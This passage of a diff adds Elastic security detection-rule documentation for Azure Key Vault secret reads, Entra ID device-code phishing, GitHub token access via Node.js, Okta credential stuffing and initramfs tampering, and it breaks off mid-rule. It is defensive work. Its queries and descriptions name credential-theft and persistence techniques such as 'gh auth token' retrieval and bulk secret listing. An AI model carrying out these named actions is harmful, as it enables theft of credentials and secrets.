indicate retrieval of keys, secrets, or certificates from the Key Vault. +- Check the `source.ip` or `geo.*` fields to identify the source of the retrieval requests. Look for unusual or unexpected IP addresses, especially those associated with known malicious activity or geographic locations that do not align with the user's typical behavior. +- Use the `time_window` field to analyze the frequency of retrieval operations. If multiple retrievals occur within a short time frame (e.g., within a few minutes), it may indicate excessive or suspicious activity. +- Correlate the retrieval operations with other security events or alerts in the environment to identify any patterns or related incidents. +- Triage the user with Entra ID sign-in logs to gather more context about their authentication behavior and any potential anomalies. + + +*False positive analysis* + +- Routine administrative tasks or automated scripts may trigger excessive retrievals, especially in environments where Key Vaults are heavily utilized for application configurations or secrets management. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals. +- Legitimate applications or services may perform frequent retrievals of keys or secrets for operational purposes, such as configuration updates or secret rotation. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals. +- Security teams may perform periodic audits or assessments that involve retrieving keys or secrets from Key Vaults. If this is expected behavior, consider adjusting the rule or adding exceptions for specific user principals or applications. +- Some applications may require frequent access to keys or secrets for normal operation, leading to high retrieval counts. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals. + + +*Response and remediation* + +- Investigate the user principal making the excessive retrieval requests to determine if they are authorized to access the Key Vault and its contents. If the user is not authorized, take appropriate actions to block their access and prevent further unauthorized retrievals. +- Review the application or service making the requests to ensure it is legitimate and authorized to access the Key Vault. If the application is unauthorized or suspicious, consider blocking it and revoking its permissions to access the Key Vault. +- Assess the impact of the excessive retrieval operations on the Key Vault and its contents. Determine if any sensitive data was accessed or compromised during the retrievals. +- Implement additional monitoring and alerting for the Key Vault to detect any further suspicious activity or unauthorized access attempts. +- Consider implementing stricter access controls or policies for Key Vaults to limit excessive retrievals and ensure that only authorized users and applications can access sensitive keys and secrets. +- Educate users and administrators about the risks associated with excessive retrievals from Key Vaults and encourage them to follow best practices for managing keys and secrets in Azure environments. + + +==== Setup + + + +*Required Azure Key Vault Diagnostic Logs* + + +To ensure this rule functions correctly, the following diagnostic logs must be enabled for Azure Key Vault: +- AuditEvent: This log captures all read and write operations performed on the Key Vault, including secret, key, and certificate retrievals. These logs should be streamed to the Event Hub used for the Azure integration configuration. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.platformlogs-* metadata _id, _index + +// Filter for Azure Key Vault read operations +| where event.dataset == "azure.platformlogs" + and event.action in ( + "VaultGet", + "KeyGet", + "KeyList", + "KeyListVersions", + "KeyGetDeleted", + "KeyListDeleted", + "SecretGet", + "SecretList", + "SecretListVersions", + "SecretGetDeleted", + "SecretListDeleted", + "CertificateGet", + "CertificateList", + "CertificateListVersions", + "CertificateGetDeleted", + "CertificateListDeleted", + "CertificatePolicyGet", + "CertificateContactsGet", + "CertificateIssuerGet", + "CertificateIssuersList" + ) + +// Truncate timestamps into 1-minute windows +| eval Esql.time_window_date_trunc = date_trunc(1 minute, @timestamp) + +// Aggregate identity, geo, resource, and activity info +| stats + Esql_priv.azure_platformlogs_identity_claim_upn_values = values(azure.platformlogs.identity.claim.upn), + Esql.azure_platformlogs_identity_claim_upn_count_distinct = count_distinct(azure.platformlogs.identity.claim.upn), + Esql.azure_platformlogs_identity_claim_appid_values = values(azure.platformlogs.identity.claim.appid), + + Esql.source_ip_values = values(source.ip), + Esql.geo_city_values = values(geo.city_name), + Esql.geo_region_values = values(geo.region_name), + Esql.geo_country_values = values(geo.country_name), + Esql.source_as_organization_name_values = values(source.as.organization.name), + + Esql.event_action_values = values(event.action), + Esql.event_count = count(*), + Esql.event_action_count_distinct = count_distinct(event.action), + Esql.azure_resource_name_count_distinct = count_distinct(azure.resource.name), + Esql.azure_resource_name_values = values(azure.resource.name), + Esql.azure_platformlogs_result_type_values = values(azure.platformlogs.result_type), + Esql.cloud_region_values = values(cloud.region), + + Esql.agent_name_values = values(agent.name), + Esql.azure_subscription_id_values = values(azure.subscription_id), + Esql.azure_resource_group_values = values(azure.resource.group), + Esql.azure_resource_id_values = values(azure.resource.id) + +by Esql.time_window_date_trunc, azure.platformlogs.identity.claim.upn + +// keep relevant fields +| keep + Esql.time_window_date_trunc, + Esql_priv.azure_platformlogs_identity_claim_upn_values, + Esql.azure_platformlogs_identity_claim_upn_count_distinct, + Esql.azure_platformlogs_identity_claim_appid_values, + Esql.source_ip_values, + Esql.geo_city_values, + Esql.geo_region_values, + Esql.geo_country_values, + Esql.source_as_organization_name_values, + Esql.event_action_values, + Esql.event_count, + Esql.event_action_count_distinct, + Esql.azure_resource_name_count_distinct, + Esql.azure_resource_name_values, + Esql.azure_platformlogs_result_type_values, + Esql.cloud_region_values, + Esql.agent_name_values, + Esql.azure_subscription_id_values, + Esql.azure_resource_group_values, + Esql.azure_resource_id_values + +// Filter for suspiciously high volume of distinct Key Vault reads by a single actor +| where Esql.azure_platformlogs_identity_claim_upn_count_distinct == 1 and Esql.event_count >= 10 and Esql.event_action_count_distinct >= 2 + +| sort Esql.time_window_date_trunc desc + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ +* Sub-technique: +** Name: Cloud Secrets Management Stores +** ID: T1555.006 +** Reference URL: https://attack.mitre.org/techniques/T1555/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-first-occurrence-of-entra-id-auth-via-devicecode-protocol.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-first-occurrence-of-entra-id-auth-via-devicecode-protocol.asciidoc new file mode 100644 index 0000000000..759e2b9363 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-first-occurrence-of-entra-id-auth-via-devicecode-protocol.asciidoc @@ -0,0 +1,173 @@ +[[prebuilt-rule-8-19-8-first-occurrence-of-entra-id-auth-via-devicecode-protocol]] +=== First Occurrence of Entra ID Auth via DeviceCode Protocol + +Identifies when a user is observed for the first time in the last 14 days authenticating using the device code authentication workflow. This authentication workflow can be abused by attackers to phish users and steal access tokens to impersonate the victim. By its very nature, device code should only be used when logging in to devices without keyboards, where it is difficult to enter emails and passwords. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* +* logs-azure.activitylogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://aadinternals.com/post/phishing/ +* https://www.blackhillsinfosec.com/dynamic-device-code-phishing/ +* https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/ +* https://learn.microsoft.com/en-us/entra/identity/conditional-access/concept-authentication-flows + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Use Case: Identity and Access Audit +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 6 + +*Rule authors*: + +* Elastic +* Matteo Potito Giorgio + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating First Occurrence of Entra ID Auth via DeviceCode Protocol* + + +This rule detects the first instance of a user authenticating via the **DeviceCode** authentication protocol within a **14-day window**. The **DeviceCode** authentication workflow is designed for devices that lack keyboards, such as IoT devices and smart TVs. However, adversaries can abuse this mechanism by phishing users and stealing authentication tokens, leading to unauthorized access. + + +*Possible Investigation Steps* + + + +*Identify the User and Authentication Details* + +- **User Principal Name (UPN)**: Review `azure.signinlogs.properties.user_principal_name` to identify the user involved in the authentication event. +- **User ID**: Check `azure.signinlogs.properties.user_id` for a unique identifier of the affected account. +- **Authentication Protocol**: Confirm that `azure.signinlogs.properties.authentication_protocol` is set to `deviceCode`. +- **Application Used**: Verify the application through `azure.signinlogs.properties.app_display_name` and `azure.signinlogs.properties.app_id` to determine if it is an expected application. + + +*Review the Source IP and Geolocation* + +- **Source IP Address**: Check `source.ip` and compare it with previous authentication logs to determine whether the login originated from a trusted or expected location. +- **Geolocation Details**: Analyze `source.geo.city_name`, `source.geo.region_name`, and `source.geo.country_name` to confirm whether the login location is suspicious. +- **ASN / ISP Details**: Review `source.as.organization.name` to check if the IP is associated with a known organization or cloud provider. + + +*Examine Multi-Factor Authentication (MFA) and Conditional Access* + +- **MFA Enforcement**: Review `azure.signinlogs.properties.applied_conditional_access_policies` to determine if MFA was enforced during the authentication. +- **Conditional Access Policies**: Check `azure.signinlogs.properties.conditional_access_status` to understand if conditional access policies were applied and if any controls were bypassed. +- **Authentication Method**: Look at `azure.signinlogs.properties.authentication_details` to confirm how authentication was satisfied (e.g., MFA via claim in token). + + +*Validate Device and Client Details* + +- **Device Information**: Review `azure.signinlogs.properties.device_detail.browser` to determine if the login aligns with the expected behavior of a device that lacks a keyboard. +- **User-Agent Analysis**: Inspect `user_agent.original` for anomalies, such as an unexpected operating system or browser. +- **Client Application**: Verify `azure.signinlogs.properties.client_app_used` to confirm whether the login was performed using a known client. + + +*Investigate Related Activities* + +- **Correlate with Phishing Attempts**: Check if the user recently reported phishing attempts or suspicious emails. +- **Monitor for Anomalous Account Activity**: Look for recent changes in the user's account settings, including password resets, role changes, or delegation of access. +- **Check for Additional DeviceCode Logins**: Review if other users in the environment have triggered similar authentication events within the same timeframe. + + +*False Positive Analysis* + + +- **Legitimate Device Enrollment**: If the user is setting up a new device (e.g., a smart TV or kiosk), this authentication may be expected. +- **Automation or Scripting**: Some legitimate applications or scripts may leverage the `DeviceCode` authentication protocol for non-interactive logins. +- **Shared Devices in Organizations**: In cases where shared workstations or conference room devices are in use, legitimate users may trigger alerts. +- **Travel and Remote Work**: If the user is traveling or accessing from a new location, confirm legitimacy before taking action. + + +*Response and Remediation* + + +- **Revoke Suspicious Access Tokens**: Immediately revoke any access tokens associated with this authentication event. +- **Investigate the User’s Recent Activity**: Review additional authentication logs, application access, and recent permission changes for signs of compromise. +- **Reset Credentials and Enforce Stronger Authentication**: + - Reset the affected user’s credentials. + - Enforce stricter MFA policies for sensitive accounts. + - Restrict `DeviceCode` authentication to only required applications. +- **Monitor for Further Anomalies**: + - Enable additional logging and anomaly detection for DeviceCode logins. + - Set up alerts for unauthorized access attempts using this authentication method. +- **Educate Users on Phishing Risks**: If phishing is suspected, notify the affected user and provide security awareness training on how to recognize and report phishing attempts. +- **Review and Adjust Conditional Access Policies**: + - Limit `DeviceCode` authentication to approved users and applications. + - Implement stricter geolocation-based authentication restrictions. + + +==== Setup + + +This rule optionally requires Azure Sign-In logs from the Azure integration. Ensure that the Azure integration is correctly set up and that the required data is being collected. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:(azure.activitylogs or azure.signinlogs) + and ( + azure.signinlogs.properties.authentication_protocol:deviceCode or + azure.signinlogs.properties.original_transfer_method: "Device code flow" or + azure.activitylogs.properties.authentication_protocol:deviceCode + ) + and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-github-authentication-token-access-via-node-js.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-github-authentication-token-access-via-node-js.asciidoc new file mode 100644 index 0000000000..e7b19a1afe --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-github-authentication-token-access-via-node-js.asciidoc @@ -0,0 +1,113 @@ +[[prebuilt-rule-8-19-8-github-authentication-token-access-via-node-js]] +=== GitHub Authentication Token Access via Node.js + +This rule detects when the Node.js runtime spawns a shell to execute the GitHub CLI (gh) command to retrieve a GitHub authentication token. The GitHub CLI is a command-line tool that allows users to interact with GitHub from the terminal. The "gh auth token" command is used to retrieve an authentication token for GitHub, which can be used to authenticate API requests and perform actions on behalf of the user. Adversaries may use this technique to access GitHub repositories and potentially exfiltrate sensitive information or perform malicious actions. This activity was observed in the wild as part of the Shai-Hulud worm. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Discovery +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.parent.name == "node" and +process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and process.args == "gh auth token" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Container and Resource Discovery +** ID: T1613 +** Reference URL: https://attack.mitre.org/techniques/T1613/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-high-number-of-okta-device-token-cookies-generated-for-authentication.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-high-number-of-okta-device-token-cookies-generated-for-authentication.asciidoc new file mode 100644 index 0000000000..69ea4bc431 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-high-number-of-okta-device-token-cookies-generated-for-authentication.asciidoc @@ -0,0 +1,164 @@ +[[prebuilt-rule-8-19-8-high-number-of-okta-device-token-cookies-generated-for-authentication]] +=== High Number of Okta Device Token Cookies Generated for Authentication + +Detects when an Okta client address has a certain threshold of Okta user authentication events with multiple device token hashes generated for single user authentication. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://support.okta.com/help/s/article/How-does-the-Device-Token-work?language=en_US +* https://developer.okta.com/docs/reference/api/event-types/ +* https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy +* https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection +* https://www.okta.com/resources/whitepaper-how-adaptive-mfa-can-help-in-mitigating-brute-force-attacks/ +* https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security +* https://www.elastic.co/security-labs/starter-guide-to-understanding-okta + +*Tags*: + +* Use Case: Identity and Access Audit +* Data Source: Okta +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 207 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating High Number of Okta Device Token Cookies Generated for Authentication* + + +This rule detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. Note that Okta does not log unrecognized usernames supplied during authentication attempts, so this rule may not detect all credential stuffing attempts or may indicate a targeted attack. + + +*Possible investigation steps:* + +- Since this is an ESQL rule, the `okta.actor.alternate_id` and `okta.client.ip` values can be used to pivot into the raw authentication events related to this activity. +- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields. +- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields. +- Review the `okta.security_context.is_proxy` field to determine if the device is a proxy. + - If the device is a proxy, this may indicate that a user is using a proxy to access multiple accounts for password spraying. +- With the list of `okta.actor.alternate_id` values, review `event.outcome` results to determine if the authentication was successful. + - If the authentication was successful for any user, pivoting to `event.action` values for those users may provide additional context. +- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field. + - Historical analysis should indicate if this device token hash is commonly associated with the user. +- Review the `okta.event_type` field to determine the type of authentication event that occurred. + - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons. + - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying. + - If the event type is `user.session.start`, the source may have attempted to establish a session via the Okta authentication API. +- Examine the `okta.outcome.result` field to determine if the authentication was successful. +- Review the past activities of the actor(s) involved in this action by checking their previous actions. +- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity. + - This may help determine the authentication and authorization actions that occurred between the user, Okta and application. + + +*False positive analysis:* + +- A user may have legitimately started a session via a proxy for security or privacy reasons. +- Users may share an endpoint related to work or personal use in which separate Okta accounts are used. + - Architecturally, this shared endpoint may leverage a proxy for security or privacy reasons. + - Shared systems such as Kiosks and conference room computers may be used by multiple users. + - Shared working spaces may have a single endpoint that is used by multiple users. + + +*Response and remediation:* + +- Review the profile of the users involved in this action to determine if proxy usage may be expected. +- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required. +- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involves and enabling multi-factor authentication (MFA). + - If MFA is already enabled, consider resetting MFA for the users. +- If any of the users are not legitimate, consider deactivating the user's account. +- Conduct a review of Okta policies and ensure they are in accordance with security best practices. +- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user. + - If so, confirm with the user this was a legitimate request. + - If so and this was not a legitimate request, consider deactivating the user's account temporarily. + - Reset passwords and reset MFA for the user. +- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule. + - This will prevent future occurrences of this event for this device from triggering the rule. + - Alternatively adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule. + - This should be done with caution as it may prevent legitimate alerts from being generated. + + +==== Setup + + +The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +from logs-okta* +| where + event.dataset == "okta.system" and + (event.action like "user.authentication.*" or event.action == "user.session.start") and + okta.debug_context.debug_data.request_uri == "/api/v1/authn" and + okta.outcome.reason == "INVALID_CREDENTIALS" +| keep + event.action, + okta.debug_context.debug_data.dt_hash, + okta.client.ip, + okta.actor.alternate_id, + okta.debug_context.debug_data.request_uri, + okta.outcome.reason +| stats + Esql.okta_debug_context_debug_data_dt_hash_count_distinct = count_distinct(okta.debug_context.debug_data.dt_hash) + by + okta.client.ip, + okta.actor.alternate_id +| where + Esql.okta_debug_context_debug_data_dt_hash_count_distinct >= 30 +| sort + Esql.okta_debug_context_debug_data_dt_hash_count_distinct desc + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Credential Stuffing +** ID: T1110.004 +** Reference URL: https://attack.mitre.org/techniques/T1110/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-initramfs-extraction-via-cpio.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-initramfs-extraction-via-cpio.asciidoc new file mode 100644 index 0000000000..a961c11853 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-initramfs-extraction-via-cpio.asciidoc @@ -0,0 +1,173 @@ +[[prebuilt-rule-8-19-8-initramfs-extraction-via-cpio]] +=== Initramfs Extraction via CPIO + +This rule detects the extraction of an initramfs image using the "cpio" command on Linux systems. The "cpio" command is used to create or extract cpio archives. Attackers may extract the initramfs image to modify the contents or add malicious files, which can be leveraged to maintain persistence on the system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* +* endgame-* +* auditbeat-* +* logs-auditd_manager.auditd-* +* logs-crowdstrike.fdr* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Data Source: Elastic Defend +* Data Source: Auditd Manager +* Data Source: Crowdstrike +* Data Source: SentinelOne +* Resources: Investigation Guide + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Initramfs Extraction via CPIO* + + +Initramfs is a temporary filesystem used during the Linux boot process, containing essential drivers and scripts. Attackers may exploit the `cpio` command to extract and modify initramfs, embedding malicious files to ensure persistence. The detection rule identifies suspicious `cpio` usage by monitoring process execution patterns, excluding legitimate parent processes, to flag potential threats. + + +*Possible investigation steps* + + +- Review the process execution details to confirm the presence of the cpio command with arguments "-H" or "--format" and "newc" to ensure the alert is not a false positive. +- Investigate the parent process of the cpio command to determine if it is an unexpected or unauthorized process, as legitimate processes like mkinitramfs or dracut should be excluded. +- Check the execution path of the parent process to verify if it matches any known legitimate paths such as "/usr/share/initramfs-tools/*" or "/nix/store/*". +- Analyze the timeline of events around the cpio execution to identify any preceding or subsequent suspicious activities that might indicate a broader attack or persistence mechanism. +- Examine the system for any unauthorized modifications or additions to the initramfs image that could indicate tampering or the presence of malicious files. +- Correlate the alert with other security data sources like Elastic Endgame, Elastic Defend, or Crowdstrike to gather additional context and assess the scope of the potential threat. + + +*False positive analysis* + + +- Legitimate system updates or maintenance activities may trigger the rule when tools like mkinitramfs or dracut are used. To handle this, ensure these processes are excluded by verifying that the parent process is mkinitramfs or dracut. +- Custom scripts or automation tools that manage initramfs might use cpio in a non-malicious context. Review these scripts and add their parent process names or paths to the exclusion list if they are verified as safe. +- Systems using non-standard initramfs management tools located in directories like /usr/share/initramfs-tools or /nix/store may cause false positives. Confirm these tools' legitimacy and update the exclusion paths accordingly. +- Development or testing environments where initramfs is frequently modified for legitimate reasons can generate alerts. Consider creating environment-specific exceptions to reduce noise while maintaining security in production systems. + + +*Response and remediation* + + +- Isolate the affected system from the network to prevent further unauthorized access or spread of potential malware. +- Terminate any suspicious processes related to the `cpio` command that do not have legitimate parent processes, such as `mkinitramfs` or `dracut`. +- Conduct a thorough review of the extracted initramfs contents to identify and remove any unauthorized or malicious files. +- Restore the initramfs from a known good backup to ensure system integrity and remove any potential persistence mechanisms. +- Monitor the system for any further suspicious activity, particularly related to the `cpio` command, to ensure the threat has been fully mitigated. +- Escalate the incident to the security operations team for further analysis and to determine if additional systems may be affected. +- Update security policies and procedures to include specific checks for unauthorized `cpio` usage and enhance detection capabilities for similar threats. + +==== Setup + + + +*Setup* + +This rule requires data coming in from Elastic Defend. + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed") and +process.name == "cpio" and process.args in ("-H", "--format") and process.args == "newc" and +not ( + process.parent.name in ("mkinitramfs", "dracut") or + ?process.parent.executable like~ ("/usr/share/initramfs-tools/*", "/nix/store/*") or + ?process.parent.args in ( + "/bin/dracut", "/usr/share/initramfs-tools/hooks/amd64_microcode", "/usr/bin/dracut", "/usr/sbin/mkinitramfs", + "/usr/sbin/dracut", "/usr/bin/update-microcode-initrd" + ) or + process.args like ("/var/tmp/mkinitramfs_*", "/tmp/tmp.*/mkinitramfs_*") or + ?process.working_directory like ( + "/var/tmp/mkinitramfs-*", "/tmp/microcode-initrd_*", "/var/tmp/mkinitramfs-*", "/var/tmp/dracut.*", + "/var/tmp/mkinitramfs_*" + ) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Pre-OS Boot +** ID: T1542 +** Reference URL: https://attack.mitre.org/techniques/T1542/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-kill-command-execution.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-kill-command-execution.asciidoc new file mode 100644 index 0000000000..6cc598684a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-kill-command-execution.asciidoc @@ -0,0 +1,171 @@ +[[prebuilt-rule-8-19-8-kill-command-execution]] +=== Kill Command Execution + +This rule detects the execution of kill, pkill, and killall commands on Linux systems. These commands are used to terminate processes on a system. Attackers may use these commands to kill security tools or other processes to evade detection or disrupt system operations. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 